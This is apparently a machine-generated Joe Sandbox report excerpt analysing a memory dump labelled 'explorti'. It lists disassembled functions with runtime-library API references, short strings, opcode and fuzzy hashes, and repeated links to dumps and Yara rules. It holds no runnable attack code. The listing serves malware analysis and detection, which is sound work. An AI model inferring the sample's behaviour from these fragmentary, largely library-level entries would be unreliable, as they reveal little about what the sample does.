Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID: \s**
API String ID: 0-1123597553
Opcode ID: 75b5033099724fbf6e0b46491cccf72bd16f44772c474d2081c670df885f30a8
Instruction ID: 1a8694de680e4d72c223af2c0837b09bf1d790d9e3d6bd1ffa3e0432b4663e21
Opcode Fuzzy Hash: 75b5033099724fbf6e0b46491cccf72bd16f44772c474d2081c670df885f30a8
Instruction Fuzzy Hash: 1451A37160C3918FD319CF2D851567ABBE1BFD5300F084A9EE4E687292D778DA44CBA2

Function 00714CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5e531c03b10bb820196dd16fd94160776ed84d2c8b917de8b3791f005ea4aa
Instruction ID: 56e575ee3ddc4a1a78d8d844ca8015cdb0745a1cd2d0f9addd93cd843d2e3430
Opcode Fuzzy Hash: 2c5e531c03b10bb820196dd16fd94160776ed84d2c8b917de8b3791f005ea4aa
Instruction Fuzzy Hash: 142250B3F515144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158648

Function 00756F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54add12c3457fa18a7df327c5dd338582f1951702bf89a14da01c839bd7c0113
Instruction ID: a7d9cf11ceba963833d655be1d30ad67032c9068376e7f13b2790b7f0e3f2ea4
Opcode Fuzzy Hash: 54add12c3457fa18a7df327c5dd338582f1951702bf89a14da01c839bd7c0113
Instruction Fuzzy Hash: 63B18B31614608CFD718CF28D486BA57BE0FF45366F258658E899CF2E1C37AE986CB40

Function 0075777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf356ec1606043db62af8e56c65e394fa19d4ffbf852dcf011cd64aa8d21289
Instruction ID: 08acbd05345a0f1f1a70d48551ac7a20c4030fede2a8ee16b666074f9a64f048
Opcode Fuzzy Hash: edf356ec1606043db62af8e56c65e394fa19d4ffbf852dcf011cd64aa8d21289
Instruction Fuzzy Hash: 9321B673F204394B770CC57E8C572BDB6E1C68C541745823AE8A6EA2C1D96CD917E2E4

Function 0075765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f0304a90eb15e3a61b06d715b515b908f0c1eaeced3ce5f6e63ce0ba39e341
Instruction ID: 2f14ef412fac43ce91cc1080443f9266a73ec2fa9e56d310375fc4d73a99cb6d
Opcode Fuzzy Hash: 44f0304a90eb15e3a61b06d715b515b908f0c1eaeced3ce5f6e63ce0ba39e341
Instruction Fuzzy Hash: 45118A23F30C255B775C817D8C172BAA5D6DBD825071F533AD826E7384E994DE23D290

Function 00758720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 6747ce01ed2b13405c027f22aa3bc7d9fcf4db20beb390af6d38e38d000444a5
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: BF115E7720018143E68486BDC8F45F6A795EBDD323B3C4B75C841AB758EDAAD94CDA02

Function 0074645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c763c0a094c8b3e59931b3a269d3aefa05c25e924bd62078bc088ccd9399146
Instruction ID: adfb4dc38e27ff0cf967e4161b5703a5fa6d746428ce72da415f5ba3335f65ea
Opcode Fuzzy Hash: 8c763c0a094c8b3e59931b3a269d3aefa05c25e924bd62078bc088ccd9399146
Instruction Fuzzy Hash: A5E0EC70281688AACF257B28D91DD8D3B6AEF63750F045454FD044A661CB79EE82C991

Function 0074A1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 3cc575b2015c501114b6223f18dd0002b982bf9542d9b4f549e5c7ed56c3d48c
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 71E0B672955228FBCB15DB998948D8AF2BCEB49B50F554496B501D3251C374DF00C7D1

Function 00712E80 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00712F1F
__Mtx_unlock.LIBCPMT ref: 00712F8C
__Cnd_broadcast.LIBCPMT ref: 00712FA3
__Mtx_unlock.LIBCPMT ref: 007130B5
__Mtx_unlock.LIBCPMT ref: 0071315B

Strings

\s**, xrefs: 00712E97, 00713014, 007131C3

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID: \s**
API String ID: 32384418-1123597553
Opcode ID: 29fee53dd3a75a02f83c1d05f07e74fda11432ab687be09085f853ccc72d1c9d
Instruction ID: 04c956beee59577ecddd2d2a874d1b2294ab7dc7b20e1dcd87716814aea94c72
Opcode Fuzzy Hash: 29fee53dd3a75a02f83c1d05f07e74fda11432ab687be09085f853ccc72d1c9d
Instruction Fuzzy Hash: C1A1F3B0A00619EFDB11DF68D8497AAB7F9FF15310F008169E815D7282EB38EA55CB91

Function 00727870 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

__Cnd_unregister_at_thread_exit.LIBCPMT ref: 0072795C
__Cnd_destroy_in_situ.LIBCPMT ref: 00727968
__Mtx_destroy_in_situ.LIBCPMT ref: 00727971

Strings

@yr, xrefs: 0072794A
'krd+w, xrefs: 00727879, 0072790B
d+w, xrefs: 00727904, 00727912, 0072790A

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: 'krd+w$@yr$d+w
API String ID: 4078500453-3585922776
Opcode ID: 48d3405168189084c6890de1774c364cf684c16e1f3feb42920433d450a30a88
Instruction ID: 1b207dddc71562215d844bd356794cabe9838cc25402983552f83f0ad7e8233c
Opcode Fuzzy Hash: 48d3405168189084c6890de1774c364cf684c16e1f3feb42920433d450a30a88
Instruction Fuzzy Hash: 6F3116B1904314DFD724DF68E949A6AB7E8EF15310F10063EE985C3242E779FA94C7A1

Function 00712670 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00712806
___std_exception_destroy.LIBVCRUNTIME ref: 007128A0

Strings

\s**, xrefs: 00712698
P#q, xrefs: 007127BE, 00712899
P#q, xrefs: 00712811

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: P#q$P#q$\s**
API String ID: 2970364248-2729880630
Opcode ID: 570cdaa2c5f2e0a92eb375e74cbf7ecbd453666c6685d26b5d6406a4d2e8a21c
Instruction ID: bdd44d2b3156e6eb663dbd22bba1ee528ae59466de265b72c9c90a79eb3ddf62
Opcode Fuzzy Hash: 570cdaa2c5f2e0a92eb375e74cbf7ecbd453666c6685d26b5d6406a4d2e8a21c
Instruction Fuzzy Hash: 93719271E00248DFDB04DFA8D885BDEFBB5EF59310F14412DE805A7282E778A994CBA5

Function 0072BAA2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0072BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0072BB14
_xtime_get.LIBCPMT ref: 0072BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0072BB43

Strings

\s**, xrefs: 0072BAA8

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID: \s**
API String ID: 531285432-1123597553
Opcode ID: 7e0d2ddec9cd09f7043037eda4062d8de35059bce75198560e9ada318399f034
Instruction ID: 284b26e8eeadb2f16efcc5799a66fb09064662a6574495c7cd7b58b35a563941
Opcode Fuzzy Hash: 7e0d2ddec9cd09f7043037eda4062d8de35059bce75198560e9ada318399f034
Instruction Fuzzy Hash: DD215171E00229DFDF11EFA4EC859BEBBB8EF18710F104065F501A7251DB78AD418BA1

Function 007470C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 0074710B

Strings

.exe, xrefs: 00747118
.bat, xrefs: 0074713A
.cmd, xrefs: 00747129
.com, xrefs: 0074714B

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: e0123e4776f682e7089ab7e59b72f621341912adda23af8b801637ae89a683a9
Instruction ID: ebc96bcfda548051a7c3ee6f2c44f8ba8099b12b94c3224fadab6e3c415fa562
Opcode Fuzzy Hash: e0123e4776f682e7089ab7e59b72f621341912adda23af8b801637ae89a683a9
Instruction Fuzzy Hash: 4A01F97770C61A66661C645D9C0667B17989BC2BB472A002BFD54F73C2EF4DEC03C1A0

Function 00712AD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 51COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00712B23

Strings

\s**, xrefs: 00712AF6
P#q, xrefs: 00712B2E
P#q, xrefs: 00712B18
This function cannot be called on a default constructed task, xrefs: 00712B03

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891220279.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2891341971.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_710000_explorti.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: P#q$P#q$This function cannot be called on a default constructed task$\s**
API String ID: 2659868963-2393278468
Opcode ID: 2a14b9749e7db458508579f7259dda340ac4dad829b98250e0bae69c944d6cde
Instruction ID: a7b12bc4813ad76670a0a9dbed5296be22e94601b5cd3fd49c44ccb13da9f3c6
Opcode Fuzzy Hash: 2a14b9749e7db458508579f7259dda340ac4dad829b98250e0bae69c944d6cde
Instruction Fuzzy Hash: BDF0F670A1030C9BC710DF68A84599EB7ED9F15300F5081ADFC0997201EB78AE948B95

Function 00727040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 0072726C

Strings

@.q, xrefs: 00727250
\s**, xrefs: 00727054
`zr, xrefs: 00727282

Memory Dump Source

Source File: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, Offset: 00710000, based on PE: true

Associated: 00000007.00000002.2890544230.0000000000710000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890600546.0000000000772000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890712786.0000000000779000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.000000000077B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.00000000009E2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2890744078.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
